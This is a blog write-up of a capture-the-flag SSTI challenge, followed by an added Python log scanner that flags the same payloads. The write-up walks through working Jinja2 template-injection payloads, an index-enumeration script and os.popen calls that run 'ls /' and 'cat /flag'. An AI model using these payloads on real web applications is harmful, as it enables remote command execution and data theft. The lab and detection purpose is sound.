ctfshow-web361(SSTI)
2022-04-23 18:29:00 【m0_62094846】
The page shows Hello, so I guessed the input parameter is name.
?name={{[].__class__.__base__.__subclasses__()}}
Next, a script is needed to enumerate the subclasses and find the one we need (I used someone else's; I can't write Python scripts yet).
Here the os._wrap_close class is used.
import requests
from tqdm import tqdm

# Walk the subclass list index by index and report the index at which
# os._wrap_close appears (the challenge instance URL is the one from the writeup).
for i in tqdm(range(233)):
    url = 'http://5e2ef65c-fcb3-4ca5-9502-acab1d21ebc8.challenge.ctf.show/?name={{%22%22.__class__.__bases__[0].__subclasses__()['+str(i)+']}}'
    r = requests.get(url=url).text
    if 'os._wrap_close' in r:
        print(i)
Output: 132
Now put it to use.
Use __init__.__globals__ to find popen (it only needs to be findable; the position doesn't matter).
__globals__:
This attribute is specific to functions and records the global variables of the module in which the function was defined. If a module imports libraries such as os or sys, but we can only reach a function or an object of that module, the __globals__ attribute still gives access to the module's globals.
So __init__.__globals__ should be how we reach the global variables.
?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__}}
This should be calling popen from the globals.
The os.popen() method opens a pipe from a command. (I don't fully understand the details; roughly it means commands can be run.)
The terminal output of popen is obtained with p.read().
?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']}}
For a file opened with open() in a readable mode (including r, r+, rb, rb+), read() reads the file content byte by byte (or character by character). (Perhaps popen relies on open(); I'm not sure.)
?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('ls /').read()}}
?name={{[].__class__.__base__.__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}
I can roughly follow it and understand why it works, but I can't apply it myself yet.
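From the defender's side, the payload chain above leaves a distinctive trail in web-server access logs. The following stdlib-only Python is an added example, not part of the original writeup: it decodes the query string of each log line and flags requests that combine several of the markers seen above (template braces, the dunder walk, popen, read()). The log lines, client address and marker list are assumptions constructed for this example.

```python
"""Flag access-log requests carrying the Jinja2/Python SSTI chain from this writeup."""
import re
from urllib.parse import parse_qsl, unquote_plus, urlsplit

# Markers taken from the payload chain above: template braces plus the dunder
# walk from a literal to os.popen(...).read(). Assumed list, tune to taste.
SSTI_MARKERS = (
    "{{", "{%", "__class__", "__base__", "__bases__", "__subclasses__",
    "__init__", "__globals__", "popen", ".read()",
)

# Common-log-format lines constructed for this example (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [23/Apr/2022:18:29:00 +0800] "GET /?name=alice HTTP/1.1" 200 12',
    '203.0.113.7 - - [23/Apr/2022:18:29:05 +0800] "GET /?name=%7B%7B%5B%5D.__class__.__base__.__subclasses__()%7D%7D HTTP/1.1" 200 8012',
    '203.0.113.7 - - [23/Apr/2022:18:29:40 +0800] "GET /?name=%7B%7B%5B%5D.__class__'
    '.__base__.__subclasses__()%5B132%5D.__init__.__globals__%5B%27popen%27%5D'
    '(%27cat%20/flag%27).read()%7D%7D HTTP/1.1" 200 40',
]

LOG_LINE = re.compile(r'^(?P<client>\S+) .*"(?P<method>[A-Z]+) (?P<path>\S+) HTTP/[\d.]+"')

def decode_fully(value: str, rounds: int = 3) -> str:
    """Undo repeated percent-encoding; probes are often double-encoded."""
    for _ in range(rounds):
        decoded = unquote_plus(value)
        if decoded == value:
            break
        value = decoded
    return value

def score_request(path: str) -> dict:
    """Map each query parameter to the SSTI markers found in its decoded value."""
    hits = {}
    for key, raw in parse_qsl(urlsplit(path).query, keep_blank_values=True):
        found = [m for m in SSTI_MARKERS if m in decode_fully(raw)]
        if found:
            hits[key] = found
    return hits

def scan_log(lines, min_markers: int = 2) -> list:
    """Return (client, path, markers) for lines with at least min_markers distinct hits."""
    alerts = []
    for line in lines:
        m = LOG_LINE.search(line)
        if not m:
            continue  # not a request line we can parse
        hits = score_request(m.group("path"))
        markers = sorted({x for found in hits.values() for x in found})
        if len(markers) >= min_markers:  # one lone brace is noise; two markers is not
            alerts.append((m.group("client"), m.group("path"), markers))
    return alerts
```

The threshold of two distinct markers keeps a harmless `{{name}}` out of the alert list while the enumeration and popen stages both trip it.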
Copyright notice
This article was written by [m0_62094846]; please include the original link when reposting. Thanks.
https://blog.csdn.net/m0_62094846/article/details/124347670